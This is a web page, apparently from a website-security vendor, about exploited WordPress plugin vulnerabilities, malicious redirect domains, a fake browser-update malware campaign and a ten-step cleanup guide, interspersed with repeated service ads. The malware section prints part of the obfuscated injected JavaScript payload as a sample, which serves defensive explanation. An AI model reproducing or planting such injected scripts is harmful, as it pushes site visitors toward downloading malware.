wordpress hack fix – Attacker.NET

WordPress Yuzo Related Posts plugin vulnerability – Thousands of WordPress websites have been Hacked

Hackers are exploiting it and injecting their malicious javascripts into files and database mainly in the “siteurl” and “home” rows in your wp_options table to cause redirects to other malicious websites such as:

hellofromhony[.]com
hellofromhony[.]org
destinywall[.]org
clevertrafficincome[.]com
notifymepush[.]info
pushmeandtouchme[.]info
click.newsfeed[.]support
visnu[.]icu
premium-mobile[.]info
plutonium[.]icu
monitornotifyfriends[.]info
notifymepush[.]info

And many others.

Signup and Try our malware removal service and let’s clean & protect your websites!

You can check your website securityby using this website malware scanner

https://scan.attacker.net

YellowPencil WordPress Plugin Vulnerability is largely exploited

Any versions below 7.2.0 is vulnerable to this security issue and is likely hacked.

And many others.

Signup and Try our malware removal service and let’s clean & protect your websites!

You can check your website securityby using this website malware scanner

https://scan.attacker.net

**Update: They released a fix: https://yellowpencil.waspthemes.com/docs/important-security-update/

Stored XSS vulnerability found in Social Warfare plugin causing Redirects to Malicious websites

If you use the Social Warfare plugin for WordPress then you are likely vulnerable to this security issue or already hacked.

You can check your website security by using this free website malware scanner https://scan.attacker.net

The vulnerability was mainly found in version v 3.5.2 and it’s being exploited for some time.

Hackers are exploiting it and injecting javascripts into files and database mainly in the social_warfare_settings in your wp_options table to cause redirects to other malicious websites such as:

setforspecialdomain[.]com

setforconfigplease[.]com

getmyfreetraffic[.]com

redrentalservice[.]com

strangefullthiggngs[.]com

and many others.

Signup and Try our malware removal service and let’s clean & protect your websites!

You can check your website securityby using this website malware scanner

https://scan.attacker.net

Vulnerability found in WordPress Easy WP SMTP plugin causing Malicious Redirects to other sites

If you use Easy WP SMTP plugin for wordpress then you are likely vulnerable to this security issue or already hacked.

You can check your website security by using this free website malware scanner https://scan.attacker.net

The vulnerability was mainly found in version v 1.3.9 and it’s being exploited for some time.

Hackers are exploiting it and injecting javascripts into files and database to cause redirects to other malicious websites such as:

setforspecialdomain[.]com

setforconfigplease[.]com

getmyfreetraffic[.]com

redrentalservice[.]com

strangefullthiggngs[.]com

and many others.

Signup and Try our malware removal service and let’s clean & protect your websites!

You can check your website securityby using this website malware scanner

https://scan.attacker.net

Thousands of websites infected by Fake Outdated Browser malware and popups

Our security scanners detected thousands of recently infected websites by this fake outdated browser update malware which shows a popup window asking the visitor to update their outdated browser by clicking on the “Update” button which is a link to malicious .exe or .zip files to infecte their computers.

The malware is targeting Firefox, chrome, IE and other browsers and it shows customized popup windows to match the browser you are using.

You can check your website security by using this free website malware scanner https://scan.attacker.net

The malware is usally injected into .js files, Here is an example of the malicious javascript malware:

<script type=”text/javascript“> eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k
REMOVED…
REMOVED…
REMOVED…
rm|ul|secure|setCookie|update_2019_02|lookupRedirect|saoverlay|inherit|1000|footer_button|setStr|weight|bShowPassed|Uint8Array|array|getCookie|none|modal_h|Update|subarray|35px|search|position|enc1|translate|filename|of|isIEponents|24px|0px|possible|outdated|this|sAdsUrl2|as|content|set_|15px|18px|flexbox|setTime|substring|items|opera|isChrome|init_Chrome|h1|isOpera|D1|td|init_Firefox|viettellamdong|jm|isFirefox|Opera|ActiveXObject|h2|init_Opera|init_Edge|business|label|h5|init_Safari|h4|XMLHTTP|isEdge|init_Android|Safari|attr|h3|init_IE|Chrome|marketing
REMOVED…
REMOVED…
REMOVED…
pssacS|Ci9PSpH|F5zqjAc|Firefox|firefox|sLqiUR0|Internet|forEach|call|querySelectorAll|default|switch|Explorer|ie|wicS3do|caption|baseline|due|version|table|soon|occurred|has|sBB68wf|Center|critical|The||following|personal|and|stored|Loss|versions|are|also|on|stream|octet|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|match|Za|Int32Array|Uint32Array|Array|byteLength|set|z0|||while|removeChild|revokeObjectURL|application|click|appendChild|Blob|createElement|createObjectURL|Confidential|your|small|strong|sub|samp|kbd|em|ins|sup|tt|fieldset|form|legend|ol|dd|dl|dt|dfn|strike|leak|blockquote|address|iframe|onclick|html|pre|applet|abbr|information|big|code|cite|h6|del’.split(‘|’),0,{})) </script> <script type=”text/javascript“>var _Hasync= _Hasync|| []; _Hasync.push([‘Histats.start’, ‘1,4214393,4,0,0,0,00010000’]); _Hasync.push([‘Histats.fasi’, ‘1’]); _Hasync.push([‘Histats.track_hits’, ”]); (function() { var hs = document.createElement(‘script’); hs.type = ‘text/javascript’; hs.async = true; hs.src = (‘//s10.histats.com/js15_as.js’); (document.getElementsByTagName(‘head’)[0] || document.getElementsByTagName(‘body’)[0]).appendChild(hs); })();</script> <noscript><a href=”/” target=”_blank”><img src=”//sstatic1.histats.com/0.gif?4214393&101″ alt=”counter customizable free hit” border=”0″></a></noscript> <script type=”text/javascript“> </script>

When viewed in a browser:

Signup and Try our malware removal service and let’s clean & protect your websites!

You can check your website securityby using this website malware scanner

https://scan.attacker.net

How to Clean a Hacked WordPress website in 10 simple steps.

Do you think your WordPress has been hacked?

If you think that your WordPress website is hacked and you confirmed this feeling or suspicion using any security plugins or website malware scanners such as our free malware scanner located at https://scan.attacker.net then it’s better to ask a professional to clean your website to ensure it’s fully and properly cleaned and SEO remains unaffected. Feel free to take a look at our website malware removal service and https://attacker.net/website-security-plans-pricing

Or feel free to try and follow the below steps if you want to try cleaning it yourself:

How to tell and determine if your website was hacked?

Do you see any strange, unrecognized or inappropriate content on your site?
Your site started consuming more resources or running slow?
Do you see unrecognized users, admin users, FTP or email accounts on your site?
Unrecognized files or folders?
Customer reporting stolen credit card after purchasing something from your website?
Google Chrome, Firefox or other browsers showing a red warning when visiting your website?
Do you see any unrecognized ads, popups or redirects to other sites?
Your hosting provider suspended your hosting account?
If your site is listed as hacked or harmful in Google searches.
If you receive a warning from Google webmaster tools or other blacklists.
If Google Adwords suspended your running Ads.

You can check your website security by using this free website malware scanner https://scan.attacker.net

WordPress Hack repair and malware removal steps:

1- The most important step is to stay calm and focused. Stress is a counterproductive. Take a deep breath and continue reading.

2- It’s very important to generate a full website and database backup.

3- Get a fresh WordPress copy from https://wordpress.org/download/ and start with replacing your WordPress core folders such as:

/wp-admin
/wp-includes

Most WordPress malware infections are targeting the core files and folders. If the malware/hack issue remains then you need to check and investigate your wp-content folder and all themes and plugins that you use on the website. If it continues, then you need to check your database too. You may also need to check your index.php , wp-config.php and .htaccess file and other common files for any inserted and injected malware.

compare your current live files to the fresh copy you just downloaded using diff Linux command or file comparison tools such as DiffNow or similar tools. Check all reported and infected files and clean or replace it with a clean copy.

4- Update and upgrade WordPress, themes and plugins once you clean and remove the malware/hack. Remove any themes or plugins you don’t use.

5- Review your administrator users for any hidden fake admin users created by the hackers. Make sure to change all of your passwords.

6- Review your plugins and make sure you recognize all of it, Fake plugins installed and placed by hackers are very common. Remove any plugins you don’t use.

7- Once you are done cleaning your website, It’s the time to make a full website backup including database backup.

8- Scan your computer using a good anti-virus software.

9- Check if your website is blacklisted by any search engines or blacklists / anti-virus vendors (Google, Bing, Norton, McAfee, Yandex, etc) and submit reconsideration and reindexing requests whenever needed to make sure your SEO and ranking is not affected by the hack.

10- Stay current and up2date, Keep your wordPress, plugins, themes and everything updated and frequently change your passwords.

Signup now and let’s clean & protect your websites!

You can check your website security by using this free website malware scanner

https://scan.attacker.net